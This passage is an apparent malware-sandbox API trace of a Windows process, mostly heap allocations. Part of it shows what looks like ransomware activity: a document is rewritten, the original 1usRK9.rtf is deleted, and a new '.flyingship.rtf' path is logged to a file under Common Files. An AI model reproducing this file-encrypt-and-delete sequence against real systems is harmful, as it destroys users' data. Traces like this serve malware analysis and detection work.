hHeap=0x8a0000) returned 1 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.826] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0178.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd858, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.826] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.826] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xa052, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xa052, lpOverlapped=0x0) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.827] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.828] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.828] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0178.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.829] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.830] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.830] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.830] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", lpFilePart=0x0) returned 0x53 [0178.832] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xfdbec80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 0x90ae18 [0178.832] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\1usrk9.rtf")) returned 1 [0178.840] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xfdbec80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 0 [0178.840] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.840] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.841] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.841] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.841] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.841] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.842] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.842] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.842] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.842] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.843] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.843] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0178.843] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.843] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.844] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0178.844] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x193d, lpOverlapped=0x0) returned 1 [0178.845] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0178.845] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x193d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.845] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0178.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf\r\n", cchWideChar=97, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0178.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x61) returned 0x8e8320 [0178.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf\r\n", cchWideChar=97, lpMultiByteStr=0x8e8320, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf\r\n", lpUsedDefaultChar=0x0) returned 97 [0178.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0178.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0178.845] WriteFile (in: hFile=0x138, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x60, lpOverlapped=0x0) returned 1 [0178.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0178.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.845] CloseHandle (hObject=0x138) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0178.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0178.848] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0178.848] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 